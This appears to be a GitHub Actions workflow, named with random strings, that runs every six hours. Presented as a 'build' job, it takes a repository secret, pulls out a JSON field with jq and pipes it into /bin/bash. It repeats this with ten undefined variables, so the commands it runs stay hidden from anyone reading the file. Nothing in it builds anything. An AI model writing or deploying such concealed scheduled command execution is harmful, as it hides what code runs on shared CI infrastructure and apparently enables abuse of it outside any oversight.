name: lidagong0987

on:
  workflow_dispatch:
  schedule:
    - cron: '20 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lidagong0987
        env:
          bhjtf820: ${{ secrets.bhjtf820 }}
        run: |
          echo $bhjtf820 | jq -r .uaj6 | /bin/bash
          echo $sqq722 | jq -r .dl805 | /bin/bash
          echo $bem0 | jq -r .j28 | /bin/bash
          echo $spi31368 | jq -r .rmlnr49 | /bin/bash
          echo $fu55975 | jq -r .ksi30142 | /bin/bash
          echo $smj6 | jq -r .yczo0736 | /bin/bash
          echo $as765 | jq -r .rq136 | /bin/bash
          echo $ql4 | jq -r .p285 | /bin/bash
          echo $tlmny360 | jq -r .agwld590 | /bin/bash
          echo $yx3271 | jq -r .vnn890 | /bin/bash
          echo $bui7 | jq -r .fnv6022 | /bin/bash

